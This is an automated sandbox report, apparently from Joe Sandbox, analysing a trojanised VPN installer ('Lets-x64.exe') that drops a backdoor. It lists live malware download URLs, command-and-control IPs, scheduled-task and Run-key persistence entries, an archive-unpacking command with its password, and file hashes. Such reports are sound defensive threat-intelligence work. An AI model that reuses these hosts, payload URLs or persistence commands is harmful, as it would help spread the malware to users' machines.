                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582022 Sample: Lets-x64.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 119 ooddoo.top 2->119 125 Suricata IDS alerts for network traffic 2->125 127 Malicious sample detected (through community Yara rule) 2->127 129 Multi AV Scanner detection for submitted file 2->129 131 10 other signatures 2->131 11 Lets-x64.exe 4 2->11         started        14 iusb3mon.exe 2->14         started        17 svchost.exe 2->17         started        20 rundll32.exe 2->20         started        signatures3 process4 dnsIp5 113 C:\Users\user\AppData\Local\...\lua5.1.dll, PE32+ 11->113 dropped 115 C:\Users\user\AppData\Local\...\irsetup.exe, PE32+ 11->115 dropped 22 irsetup.exe 3 17 11->22         started        149 Antivirus detection for dropped file 14->149 151 Detected unpacking (creates a PE file in dynamic memory) 14->151 153 Suspicious powershell command line found 14->153 155 8 other signatures 14->155 27 powershell.exe 14->27         started        29 cmd.exe 14->29         started        31 cmd.exe 14->31         started        33 21 other processes 14->33 117 127.0.0.1 unknown unknown 17->117 file6 signatures7 process8 dnsIp9 123 ooddoo.top 104.21.81.224, 443, 49717, 49720 CLOUDFLARENETUS United States 22->123 107 C:\Users\Public\Documents\...\_P18sPbB.exe, PE32 22->107 dropped 109 C:\ProgramData\Microsoft\Program\ziliao.jpg, DOS 22->109 dropped 111 C:\Program Files\...\letsvpn-latest.exe, PE32 22->111 dropped 141 Suspicious powershell command line found 22->141 143 Encrypted powershell cmdline option found 22->143 35 cmd.exe 22->35         started        37 powershell.exe 11 22->37         started        39 powershell.exe 11 22->39         started        45 32 other processes 22->45 41 conhost.exe 27->41         started        43 SecEdit.exe 27->43         started        47 2 other processes 29->47 49 2 other processes 31->49 51 36 other processes 33->51 file10 signatures11 process12 process13 53 _P18sPbB.exe 35->53         started        58 conhost.exe 35->58         started        60 conhost.exe 37->60         started        62 conhost.exe 39->62         started        64 conhost.exe 41->64         started        66 conhost.exe 45->66         started        72 28 other processes 45->72 68 conhost.exe 47->68         started        70 conhost.exe 49->70         started        dnsIp14 121 202.79.169.178, 25445, 49741 BCPL-SGBGPNETGlobalASNSG Singapore 53->121 101 C:\ProgramData\mntemp, DOS 53->101 dropped 103 C:\ProgramData\Program\iusb3mon.exe, PE32 53->103 dropped 105 C:\ProgramData\...\MicrosoftNetFramework.xml, XML 53->105 dropped 133 Antivirus detection for dropped file 53->133 135 Suspicious powershell command line found 53->135 137 Query firmware table information (likely to detect VMs) 53->137 139 6 other signatures 53->139 74 powershell.exe 53->74         started        77 cmd.exe 53->77         started        79 powershell.exe 53->79         started        81 3 other processes 53->81 file15 signatures16 process17 signatures18 145 Found suspicious powershell code related to unpacking or dynamic code loading 74->145 83 conhost.exe 74->83         started        85 SecEdit.exe 74->85         started        147 Uses schtasks.exe or at.exe to add and modify task schedules 77->147 87 conhost.exe 77->87         started        89 conhost.exe 79->89         started        91 SecEdit.exe 79->91         started        93 conhost.exe 81->93         started        95 conhost.exe 81->95         started        97 SecEdit.exe 81->97         started        99 3 other processes 81->99 process19

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Lets-x64.exe13%ReversingLabsWin32.Backdoor.Zegost
                              Lets-x64.exe13%VirustotalBrowse
                              Lets-x64.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Program\iusb3mon.exe100%AviraTR/Crypt.XPACK.Gen2
                              C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe100%AviraTR/Crypt.XPACK.Gen2
                              C:\ProgramData\Program\iusb3mon.exe100%Joe Sandbox ML
                              C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe100%Joe Sandbox ML
                              C:\Program Files\product1\letsvpn-latest.exe3%ReversingLabs
                              C:\ProgramData\Microsoft\Program\ziliao.jpg17%ReversingLabsWin32.Dropper.Generic
                              C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll0%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              No Antivirus matches

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ooddoo.top
                              		104.21.81.224
                              		truetrue
                                prod.globalsign.map.fastly.net
                                		151.101.2.133
                                		truefalse

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://ooddoo.top/abc/14.exetrue
                                    http://ooddoo.top/abc/14.exetrue

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.00000000065E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        http://ooddoo.top/abc/14.exel=~irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://ooddoo.top/hirsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpfalse
                                              http://ooddoo.top/abc/14.exeNirsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  http://%s/ip.txtMozilla/4.0iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpfalse
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://aka.ms/pscore6lBeqpowershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        http://ooddoo.top/abc/14.exel1~irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          http://www.microsoft.copowershell.exe, 0000000C.00000002.2187796754.000001AE9C21E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            http://www.yourcompany.comirsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              https://contoso.com/Licensepowershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://contoso.com/Iconpowershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://crl.ver)svchost.exe, 00000021.00000002.4023427630.000001F07F400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000021.00000003.2352785710.000001F07F2C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://ooddoo.top/abc/14.exeIirsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://ooddoo.top/abc/irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          http://www.indigorose.com/route.php?pid=suf9buyLets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.2522220114.0000000005661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://www.indigorose.comLets-x64.exe, 00000000.00000002.2187444306.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000021.00000003.2352785710.000001F07F333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  http://ooddoo.top/abc/14.exe;eirsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    http://104.168.152.151/abc/irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://crl.micropowershell.exe, 00000015.00000002.2468286953.00000000079F6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2470339301.0000000007A0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2468286953.0000000007A07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        http://ooddoo.top/abc/14.exeXdirsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://crl.micro4Opowershell.exe, 0000002A.00000002.2682802486.0000000007B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://contoso.com/powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2206862853.000001AEADFC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2206862853.000001AEADE8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2188375512.000001AE9F6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2413825502.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2459393253.00000000061CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2443179849.000000000647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2440447207.000000000579A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2668466400.00000000060EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2668309945.000000000565C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2659259430.000000000657D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://%s/ip.txtiusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                  https://oneget.orgXpowershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://ooddoo.top/abc/14.exeMeirsetup.exe, 00000002.00000002.4576101821.000000000615F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exeirsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2188375512.000001AE9DE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2357715905.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2377801523.0000000005161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2380767167.0000000005411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2370202474.0000000004731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2513816105.000000000508E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2516061641.00000000045F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://oneget.orgpowershell.exe, 0000000C.00000002.2188375512.000001AE9F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://www.indigorose.com/route.php?pid=suf9buydLets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2063081157.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                                https://ooddoo.top/irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                  World Map of Contacted IPs

                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs

                                                                                                                  Public IPs

                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  202.79.169.178
                                                                                                                  		unknownSingapore
                                                                                                                  		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                  104.21.81.224
                                                                                                                  		ooddoo.topUnited States
                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                  Private

                                                                                                                  IP
                                                                                                                  127.0.0.1

                                                                                                                  General Information

                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1582022
                                                                                                                  Start date and time:2024-12-29 16:08:16 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 15m 26s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:162
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:Lets-x64.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@245/106@1/3
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 42.9%
                                                                                                                  HCA Information:Failed
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                  Warnings

                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212, 172.202.163.200
                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ocsp2.globalsign.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, global.prd.cdn.globalsign.com
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2820 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5996 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                  Simulations

                                                                                                                  Behavior and APIs

                                                                                                                  TimeTypeDescription
                                                                                                                  10:09:16API Interceptor463x Sleep call for process: powershell.exe modified
                                                                                                                  10:09:34API Interceptor603223x Sleep call for process: _P18sPbB.exe modified
                                                                                                                  10:09:38API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                  10:09:46API Interceptor3054x Sleep call for process: iusb3mon.exe modified
                                                                                                                  16:09:35Task SchedulerRun new task: UserLoginStartupTask path: C:\ProgramData\program\iusb3mon.exe
                                                                                                                  16:09:40Task SchedulerRun new task: Windows Audio Endpoint Builder() path: C:\ProgramData\Data\un.exe s>x -o- -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\ /st
                                                                                                                  16:09:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  16:10:10AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  16:10:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  16:10:58AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe

                                                                                                                  Joe Sandbox View / Context

                                                                                                                  IPs

                                                                                                                  No context

                                                                                                                  Domains

                                                                                                                  No context

                                                                                                                  ASNs

                                                                                                                  No context

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Program Files\product1\letsvpn-latest.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):15405152
                                                                                                                  Entropy (8bit):7.9969741858269074
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:393216:3Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpw:3Rh8B2vB2c+kZD
                                                                                                                  MD5:E039E221B48FC7C02517D127E158B89F
                                                                                                                  SHA1:79EED88061472AE590616556F31576CA13BFC7FB
                                                                                                                  SHA-256:DC30E5DAB15392627D30A506F6304030C581FC00716703FC31ADD10FF263D70B
                                                                                                                  SHA-512:87231C025BB94771E89A639C9CB1528763F096059F8806227B8AB45A8F1EA5CD3D94FDC91CB20DD140B91A14904653517F7B6673A142A864A58A2726D14AE4B8
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j..........R5............@..........................p............@..............................................................'...........................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata...@...P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3810
                                                                                                                  Entropy (8bit):3.5689360433547153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:tCnRigEptnknQGdinigV9ll7dHAmzFzJE+:WRGryQxnjrHy+
                                                                                                                  MD5:69C282FDCD177C1AC4D6709EF841DA65
                                                                                                                  SHA1:575CBAC132F5215C9446E6B440CA44A2082F0644
                                                                                                                  SHA-256:943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
                                                                                                                  SHA-512:6B686A5D6AABE4681C6E1C83D4F32BD55D9FA26FC25ED72ECD20676C6DD3BD49CEE4F1E5D1B25F2D3A90A994BE00BF3B1366075272D4C3EA16917806DBBE0EA7
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.2.7.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.A.u.t.h.o.r.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.U.s.e.r.I.d.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.U.s.e.r.I.d.>..... . . . . . .<.L.o.g.o.n.T.

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):0.3588072191296206
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                                                                  MD5:663C5D6018506231E334FB3EA962ED1C
                                                                                                                  SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                                                                  SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                                                                  SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.8337366151111992
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugN:gJjJGtpTq2yv1AuNZRY3diu8iBVqF7
                                                                                                                  MD5:F88F9AAB06ED8968527D450DE10F58F3
                                                                                                                  SHA1:2A693E0C303773FC44CE2CAE5FE1DF82853B3920
                                                                                                                  SHA-256:C16C47D37ED7CFB31FD7F2C200A24E3865D5259490FEB08797AA4FCEBCCD85EA
                                                                                                                  SHA-512:F619FB2D0582B7983DDA1C007CD0622797B92D1EA781DF9BE78BA92813E091A69BD4F11A7AFD37490E2E4FCED14D87EC149B214443E229D4136CC836F8929000
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdaf4623d, page size 16384, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.6584764620230587
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                                                                  MD5:CAE6A711925E1BD37F65D18DA89BE621
                                                                                                                  SHA1:AD4351F66DBF2C1282DE29A3DC64B55C7888E680
                                                                                                                  SHA-256:0C30A90E25C0D059D154E4A744E01D1E08B1B0EC9C835C42C372335BEFE9A437
                                                                                                                  SHA-512:0BA518B38A4C849669CED4617A539803CD29297789143825B3D3596C71C52A3062BDA7B9E0218B499A5C7ADF59F1090BCBBE1D969376DFB36A2104A74F66992D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..b=... ...............X\...;...{......................T.~.....4....|..&....|..h.|.....4....|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................'Rc4....|..................(n.4....|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16384
                                                                                                                  Entropy (8bit):0.07913686262756893
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:E3m/setYe0EuVD3i1gq4pEOOLF3iYll58Kgvvl/QoeP/ll:E3mdzNuVD3i1gq4pEOOxiIz8KgR+t
                                                                                                                  MD5:5F5C70A45CCDDA2F7764BAAF4C3870E8
